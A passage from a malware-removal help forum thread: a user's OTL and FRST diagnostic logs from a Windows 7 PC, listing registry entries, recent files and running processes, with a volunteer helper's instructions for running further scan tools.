- Extra 'Tools' menuitem : Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm®Atheros®)
O13[b]64bit:
- gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0FE2EC0A-CBB7-4679-9CDB-F2977D6F1716}: DhcpNameServer = 192.168.0.1
O18:[b]64bit:
- Protocol\Handler\grooveLocalGWS - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\ms-help - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\ms-itss - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O20:[b]64bit:
- HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/12/28 12:51:01 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\John\Desktop\OTL.exe
[2014/12/27 09:07:33 | 000,000,000 | R--D | C] -- C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
[2014/12/26 14:28:45 | 000,000,000 | ---D | C] -- C:\FRST
[2014/12/26 12:14:06 | 000,000,000 | ---D | C] -- C:\Users\John\AppData\Roaming\LavasoftStatistics
[2014/12/26 12:13:44 | 000,358,736 | ---- | C] (Lavasoft Limited) -- C:\Windows\SysNative\LavasoftTcpService64.dll
[2014/12/26 12:13:41 | 000,312,424 | ---- | C] (Lavasoft Limited) -- C:\Windows\SysWow64\LavasoftTcpService.dll
[2014/12/26 11:00:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2014/12/26 11:00:46 | 000,272,808 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe
[2014/12/26 11:00:35 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/12/26 11:00:34 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe
[2014/12/26 11:00:34 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe
[2014/12/26 11:00:34 | 000,098,216 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/12/26 11:00:27 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Java
[2014/12/26 10:59:26 | 000,941,784 | ---- | C] (Realtek                                            ) -- C:\Windows\SysNative\drivers\Rt64win7.sys
[2014/12/26 10:59:26 | 000,073,800 | ---- | C] (Realtek Semiconductor Corporation) -- C:\Windows\SysNative\RtNicProp64.dll
[2014/12/26 10:59:12 | 009,890,008 | ---- | C] (Realtek Semiconductor Corp.) -- C:\Windows\SysWow64\RsCRIcon.dll
[2014/12/26 10:59:12 | 000,331,992 | ---- | C] (Realtek Semiconductor Corp.) -- C:\Windows\SysNative\drivers\RtsUVStor.sys
[2014/12/26 10:58:58 | 000,118,272 | ---- | C] (Intel Corporation) -- C:\Windows\SysNative\drivers\TeeDriverx64.sys
[2014/12/26 10:52:48 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 2
[2014/12/26 10:52:29 | 000,000,000 | ---D | C] -- C:\Windows\tasks\ImCleanDisabled
[2014/12/19 13:10:49 | 000,000,000 | ---D | C] -- C:\Users\John\AppData\Roaming\Octoshape
[2014/12/19 13:10:41 | 000,000,000 | ---D | C] -- C:\Users\John\AppData\Local\DIRECTV Player
[2014/12/17 19:57:31 | 000,129,752 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/12/17 19:57:25 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2014/12/17 19:57:17 | 000,093,400 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/12/17 19:57:17 | 000,063,704 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys
[2014/12/17 19:57:17 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2014/12/17 19:57:17 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes Anti-Malware
[2014/12/17 12:05:26 | 000,144,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/12/17 12:05:26 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/12/16 15:48:40 | 000,000,000 | ---D | C] -- C:\Users\John\AppData\Local\Skype
[2014/12/16 12:13:33 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Free Visio Viewer
[2014/12/16 12:13:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\YoutuubeAdBllooCke
[2014/12/16 12:12:42 | 000,000,000 | ---D | C] -- C:\ProgramData\15431041915562449580
[2014/12/16 12:12:27 | 000,000,000 | ---D | C] -- C:\ProgramData\lbihihaaofomgcababbmjgbblobipmib
[2014/12/14 03:23:13 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Dell Digital Delivery
[2014/12/11 22:07:24 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Application Updater
[2014/12/11 22:07:23 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\IObit Apps Toolbar
[2014/12/11 03:02:03 | 004,121,600 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mf.dll
[2014/12/11 03:02:03 | 003,209,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mf.dll
[2014/12/10 11:28:24 | 001,424,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WindowsCodecs.dll
[2014/12/10 11:28:18 | 000,114,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2014/12/10 11:28:18 | 000,076,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/12/10 11:28:18 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/12/10 11:28:18 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/12/10 11:28:18 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/12/10 11:28:17 | 000,718,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/12/10 11:28:17 | 000,077,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/12/10 11:28:17 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/12/10 11:28:17 | 000,034,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/12/10 11:28:16 | 002,052,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/12/10 11:28:16 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/12/10 11:28:16 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/12/10 11:28:15 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/12/10 11:28:15 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2014/12/10 11:28:13 | 000,968,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/12/10 11:28:12 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/12/10 11:28:12 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/12/10 11:28:12 | 000,316,928 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/12/10 11:28:09 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/12/10 11:28:09 | 000,066,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/12/10 11:28:08 | 002,125,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/12/10 11:28:07 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/12/10 11:28:07 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/12/10 11:28:07 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014/12/10 11:28:06 | 000,633,856 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/12/10 11:28:06 | 000,490,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/12/10 11:28:06 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/12/10 11:28:05 | 006,039,552 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/12/10 11:28:05 | 001,359,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/12/10 11:28:05 | 000,814,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/12/10 11:28:05 | 000,580,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/12/10 11:28:04 | 000,199,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/12/10 11:28:04 | 000,088,064 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/12/10 11:27:18 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2014/12/10 11:25:40 | 000,165,888 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\charmap.exe
[2014/12/10 11:25:40 | 000,155,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\charmap.exe
[2014/12/10 11:25:36 | 000,346,624 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WSManMigrationPlugin.dll
[2014/12/10 11:25:36 | 000,310,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WsmWmiPl.dll
[2014/12/10 11:25:36 | 000,266,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WSManHTTPConfig.exe
[2014/12/10 11:25:36 | 000,248,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\WSManMigrationPlugin.dll
[2014/12/10 11:25:36 | 000,214,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\WsmWmiPl.dll
[2014/12/10 11:25:36 | 000,198,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\WSManHTTPConfig.exe
[2014/12/10 11:25:36 | 000,181,248 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WsmAuto.dll
[2014/12/10 11:25:36 | 000,145,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\WsmAuto.dll
[2014/12/09 22:56:08 | 003,981,488 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe
[2014/12/09 22:06:17 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
[6 C:\Windows\SysNative\*.tmp files -> C:\Windows\SysNative\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/12/28 12:51:04 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\John\Desktop\OTL.exe
[2014/12/28 12:45:54 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/12/28 12:45:51 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/12/28 10:28:17 | 000,259,945 | ---- | M] () -- C:\Users\John\Desktop\JP_SNES_map_sm.gif~original.gif
[2014/12/27 23:43:09 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/12/27 09:14:17 | 000,021,296 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/12/27 09:14:17 | 000,021,296 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/12/27 09:06:00 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/12/27 09:05:39 | 449,073,151 | -HS- | M] () -- C:\hiberfil.sys
[2014/12/26 23:52:12 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/12/26 12:41:42 | 000,001,945 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/12/26 12:13:51 | 000,004,720 | ---- | M] () -- C:\Windows\SysWow64\LavasoftTcpService.ini
[2014/12/26 12:13:51 | 000,002,552 | ---- | M] () -- C:\Windows\SysWow64\LavasoftTcpServiceOff.ini
[2014/12/26 12:13:51 | 000,002,552 | ---- | M] () -- C:\Windows\SysNative\LavasoftTcpServiceOff.ini
[2014/12/26 11:02:20 | 000,701,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/12/26 11:02:20 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/12/26 11:01:02 | 000,783,606 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/12/26 11:01:02 | 000,663,348 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/12/26 11:01:02 | 000,122,682 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/12/26 11:00:30 | 000,098,216 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/12/26 11:00:29 | 000,272,808 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe
[2014/12/26 11:00:29 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe
[2014/12/26 11:00:29 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe
[2014/12/26 10:59:26 | 000,941,784 | ---- | M] (Realtek                                            ) -- C:\Windows\SysNative\drivers\Rt64win7.sys
[2014/12/26 10:59:26 | 000,107,552 | ---- | M] (Realtek Semiconductor Corporation) -- C:\Windows\SysNative\RTNUninst64.dll
[2014/12/26 10:59:26 | 000,073,800 | ---- | M] (Realtek Semiconductor Corporation) -- C:\Windows\SysNative\RtNicProp64.dll
[2014/12/26 10:59:12 | 009,890,008 | ---- | M] (Realtek Semiconductor Corp.) -- C:\Windows\SysWow64\RsCRIcon.dll
[2014/12/26 10:59:12 | 000,331,992 | ---- | M] (Realtek Semiconductor Corp.) -- C:\Windows\SysNative\drivers\RtsUVStor.sys
[2014/12/26 10:58:58 | 000,118,272 | ---- | M] (Intel Corporation) -- C:\Windows\SysNative\drivers\TeeDriverx64.sys
[2014/12/26 10:51:37 | 000,002,211 | ---- | M] () -- C:\Users\Public\Desktop\Advanced SystemCare 7.lnk
[2014/12/24 17:50:24 | 000,000,263 | ---- | M] () -- C:\Users\John\Desktop\Dropbox - Natalie.URL
[2014/12/17 19:57:25 | 000,001,108 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/12/16 12:10:34 | 000,358,736 | ---- | M] (Lavasoft Limited) -- C:\Windows\SysNative\LavasoftTcpService64.dll
[2014/12/16 12:10:32 | 000,312,424 | ---- | M] (Lavasoft Limited) -- C:\Windows\SysWow64\LavasoftTcpService.dll
[2014/12/12 23:09:01 | 000,144,384 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/12/12 21:33:44 | 000,115,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/12/09 22:56:10 | 003,981,488 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe
[2014/12/09 22:06:17 | 000,001,179 | ---- | M] () -- C:\Users\Public\Desktop\IObit Malware Fighter.lnk
[6 C:\Windows\SysNative\*.tmp files -> C:\Windows\SysNative\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/12/28 10:28:17 | 000,259,945 | ---- | C] () -- C:\Users\John\Desktop\JP_SNES_map_sm.gif~original.gif
[2014/12/26 12:13:51 | 000,004,720 | ---- | C] () -- C:\Windows\SysWow64\LavasoftTcpService.ini
[2014/12/26 12:13:51 | 000,002,552 | ---- | C] () -- C:\Windows\SysWow64\LavasoftTcpServiceOff.ini
[2014/12/26 12:13:51 | 000,002,552 | ---- | C] () -- C:\Windows\SysNative\LavasoftTcpServiceOff.ini
[2014/12/24 17:50:24 | 000,000,263 | ---- | C] () -- C:\Users\John\Desktop\Dropbox - Natalie.URL
[2014/12/17 19:57:25 | 000,001,108 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/12/09 22:06:17 | 000,001,179 | ---- | C] () -- C:\Users\Public\Desktop\IObit Malware Fighter.lnk
[2014/05/12 10:19:16 | 000,004,096 | -H-- | C] () -- C:\Users\John\AppData\Local\keyfile3.drm
[2014/02/27 16:56:17 | 000,000,288 | ---- | C] () -- C:\Users\John\AppData\Roaming\.backup.dm
[2014/02/26 17:29:18 | 000,103,832 | ---- | C] () -- C:\Users\John\GoToAssistDownloadHelper.exe
[2014/02/09 22:35:41 | 000,000,044 | ---- | C] () -- C:\Users\John\AppData\Roaming\WB.CFG
[2014/01/20 10:39:28 | 000,021,906 | ---- | C] () -- C:\Windows\W2BNEUnin.dat
[2014/01/15 18:05:47 | 000,073,220 | ---- | C] () -- C:\Windows\SysWow64\EPPICPrinterDB.dat
[2014/01/15 18:05:47 | 000,031,053 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern131.dat
[2014/01/15 18:05:47 | 000,029,114 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern1.dat
[2014/01/15 18:05:47 | 000,027,417 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern121.dat
[2014/01/15 18:05:47 | 000,021,021 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern3.dat
[2014/01/15 18:05:47 | 000,015,670 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern5.dat
[2014/01/15 18:05:47 | 000,013,280 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern2.dat
[2014/01/15 18:05:47 | 000,010,673 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern4.dat
[2014/01/15 18:05:47 | 000,004,943 | ---- | C] () -- C:\Windows\SysWow64\EPPICPattern6.dat
[2014/01/15 18:05:47 | 000,001,140 | ---- | C] () -- C:\Windows\SysWow64\EPPICPresetData_PT.dat
[2014/01/15 18:05:47 | 000,001,140 | ---- | C] () -- C:\Windows\SysWow64\EPPICPresetData_BP.dat
[2014/01/15 18:05:47 | 000,001,137 | ---- | C] () -- C:\Windows\SysWow64\EPPICPresetData_ES.dat
[2014/01/15 18:05:47 | 000,001,130 | ---- | C] () -- C:\Windows\SysWow64\EPPICPresetData_FR.dat
[2014/01/15 18:05:47 | 000,001,130 | ---- | C] () -- C:\Windows\SysWow64\EPPICPresetData_CF.dat
[2014/01/15 18:05:47 | 000,001,104 | ---- | C] () -- C:\Windows\SysWow64\EPPICPresetData_EN.dat
[2014/01/15 18:05:47 | 000,000,097 | ---- | C] () -- C:\Windows\SysWow64\PICSDK.ini
[2014/01/15 17:59:13 | 000,000,060 | ---- | C] () -- C:\Windows\EPNX510.ini
[2013/11/24 02:58:31 | 000,000,000 | -H-- | C] () -- C:\ProgramData\DP45977C.lfl
[2013/11/24 02:26:54 | 019,587,072 | ---- | C] () -- C:\Windows\SysWow64\igdfcl32.dll
[2013/11/24 02:26:54 | 000,241,152 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll
[2013/11/24 02:26:54 | 000,109,056 | ---- | C] () -- C:\Windows\SysWow64\igdail32.dll
[2013/05/11 17:17:52 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll
 
========== ZeroAccess Check ==========
 
[2009/07/13 22:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 20:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 19:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 19:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 21:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 19:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

< End of report >
 


  • 0

Advertisements


#2
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello, snoopdog1951. Welcome to Geeks to Go! My nickname is Nevan and I will be helping you getting your system back on its electronic feet.

Before we get started, please keep these things in mind:
  • Always read every part of my post carefully. If you don't, you may do something wrong and there could be more problems to solve.
  • If your security programs give you any warnings when using tools I asked you to, don't be afraid. Every tool I provide to you is 100% safe.
  • Only run tools that I ask you to. Some of them can be dangerous to your system as they have much power.
  • You should save or print my instructions. It is possible that we will be using Safe mode, which will cut you off from your internet connection and without access to them, you might be stuck.
  • Malware removal is a complicated process that takes multiple steps to be completed. Don't give up, be patient.
  • The tools we are going to use and your software may cause unwanted interactions. Because of that, I recommend you to make backups of any important files from your machine before proceeding as they might be lost.
  • I recommend you to stay with me until I tell you that we are done. It is important because when your system does not show any bad symptoms anymore it does not mean that it is 100% clean.
  • Your time to reply is limited. If you don't reply within 3 days, your topic will be closed and you will have to request it to be reopened by contacting one of Moderator group members with the link to this topic.
  • Every program I ask you to download should be saved to and run from desktop. If you don't know how to choose the direction of where a download is saved, check this site. You can also just copy these programs to your desktop manually and then run them from there.
  • Remember that the fixes I give you are only for your machine. Using it on other systems may (and probably will) cause problems.
  • Finally, if you have any questions or are unsure about something, just ask. I will not blame you for it. It is better to ask rather than regret it later.
Also, please note that I'm currently in training, so my answers to you will have to be checked first by an experienced helper before I can post them. This can lengthen the time between my answers to you, but in return you will have an extra person reviewing your log.

Let's get started :)

 
Step #1
FRST Scan
  • Download Farbar Recovery Scan Tool and save it to your Desktop.
  • Right click FRST64.exe and click Run as administrator. When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is checked and press the Scan button.
  • It will produce two logs - one called FRST.txt and another one called Addition.txt in the same directory the tool is run from.
  • Select all (CTRL+A) the content of the logs, copy them (CTRL+C) and paste (CTRL+V) them into your next reply.
 
Step #2
CKScanner
  • Download CKScanner and save it to your Desktop.
  • Right click CKScanner.exe and select Run as administrator.
  • Give permission if necessary, and click Search For Files.
  • After a very short time, when the cursor hourglass disappears, click Save List To File.
  • A message box will verify the file saved. Please run the program once only.
  • Double-click the CKFiles.txt on your desktop and copy/paste the content in your next reply.
 
Things that should appear in your next post:
  • FRST.txt log content
  • Addition.txt log content
  • CKFiles.txt log content

  • 0

#3
godawgs

godawgs

    Teacher

  • Retired Staff
  • 8,228 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0

#4
godawgs

godawgs

    Teacher

  • Retired Staff
  • 8,228 posts

User returned. Please post the log requested.


  • 0

#5
snoopdog1951

snoopdog1951

    Member

  • Topic Starter
  • Member
  • PipPip
  • 17 posts

When this is reopened will I receive instuctions via my email or due I watch for posts on your site?

 

John


  • 0

#6
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
This is already reopened, I'm waiting for you to post the logs that I've asked for in post #2 :)
  • 0

#7
snoopdog1951

snoopdog1951

    Member

  • Topic Starter
  • Member
  • PipPip
  • 17 posts

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-01-2015
Ran by John (administrator) on JOHN-PC on 05-01-2015 13:14:11
Running from C:\Users\John\Desktop
Loaded Profile: John (Available profiles: John)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(IObit) C:\Program Files (x86)\IObit\Smart Defrag 3\SmartDefrag.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
